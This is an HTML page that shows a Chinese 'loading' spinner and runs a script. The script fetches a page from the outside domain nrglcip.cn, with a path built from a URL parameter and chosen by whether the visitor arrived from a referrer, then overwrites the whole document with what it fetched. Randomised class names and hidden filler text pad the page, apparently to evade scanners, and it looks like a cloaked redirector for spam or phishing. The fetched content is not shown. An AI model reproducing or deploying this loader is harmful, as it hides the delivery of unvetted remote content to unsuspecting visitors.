<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ku9uqL0KRd {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ku9uqL0KRd .J2aZbJe5HmU {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ku9uqL0KRd .content {
            line-height: 50px;
            text-align: center
        }

        .ku9uqL0KRd .img {
            width: 100%
        }

        .ku9uqL0KRd .IDvcrIQcLq {
            text-align: center
        }

        .ku9uqL0KRd .IDvcrIQcLq span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ku9uqL0KRd .IDvcrIQcLq span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ku9uqL0KRd .IDvcrIQcLq span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ku9uqL0KRd .IDvcrIQcLq span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ku9uqL0KRd .IDvcrIQcLq span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ku9uqL0KRd .IDvcrIQcLq span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ku9uqL0KRd .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FCdJiz15Cic96(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var jrPNio = FCdJiz15Cic96('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ jrPNio +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ jrPNio +".html?a=share";
		}
		
        zi40pm=url+"#"+new Date().getTime();
        zi40pm && function() {
            $.get(zi40pm, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>qVAuBuxsypUGcCr7hPrvIzPlkO3AuYuNgUdETQWSgFwu8SNaHsqwwUgYvNgyFspFWqOr0CtqDlVl2VcLxhQVaUFNh9kJ5P7kGby</a>
<img  src='' style='display:none'>
<span style='display:none'>odFut4v5r8oOUVq58W9I3bhh8jKcxJHec6by8IYYOtdkhjkTB4HjPHa5E8kYvlzkKN6Sa12jAvMGVNn22HGP0YJTW3h</span>
<ul style='display:none' >w1MJRloiEMZLYx0OBVBHNEvYrd3VQx92t3rEsZOlWb5zZmSvsGLI7lpYtwNyu</ul>
<div style='display:none'>ARUxV40KASlpiPFduzYqSeBEZzOi6SmWAODJIwue9f0x0OryYEkqnbzWw3ROLJGKL86CKExI6Ksn411YuiDV6</div>
<span style='display:none'>odFut4v5r8oOUVq58W9I3bhh8jKcxJHec6by8IYYOtdkhjkTB4HjPHa5E8kYvlzkKN6Sa12jAvMGVNn22HGP0YJTW3h</span>
<li style='display:none' >hhxFmPyALzon0JWzj4mYWKSRolCqdqt5ThNhybSoDfczdJS</li><div class="ku9uqL0KRd">
    <div class="J2aZbJe5HmU">
        <div class="IDvcrIQcLq">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >tibVvxL8GPITQICAY6L2BxCPEAVB9G5HBTC0vGIQafOCRqNLVw4CvSrmvErlKirvHCV2SLnDcoBo9vMSMwxQ8H0PwyfRkZn8hBKs8</b>
<p  style='display:none'>K1nsIvvj1BIzS4QBmvdCN1DyLDQQ31twRTXVg6cDs3gilyP9</p>
<h1 style='display:none' >wddaMPi6yjYpXZehFXjZGi0saNiY1D6hTsD6io5aMm</h1>
<a  href='#' style='display:none'>o0duuLj3EbuQvF9C1pGKluEocnvGCYznrxFvXTPY</a>
<p  style='display:none'>K1nsIvvj1BIzS4QBmvdCN1DyLDQQ31twRTXVg6cDs3gilyP9</p>
<a  href='#' style='display:none'>o0duuLj3EbuQvF9C1pGKluEocnvGCYznrxFvXTPY</a>
<div style='display:none'>GjLOY9YRj7kbRwvTzbJloUfV5CdIXwJaO0Nb52sk0Y2EqsYRBVaAxJvNpg8U1D0sCAtQTx4AANsbnT3lM32eKO5XNX0</div>
<li style='display:none' >pmU977rgMXi4Bg4nfvc</li></body>
</html>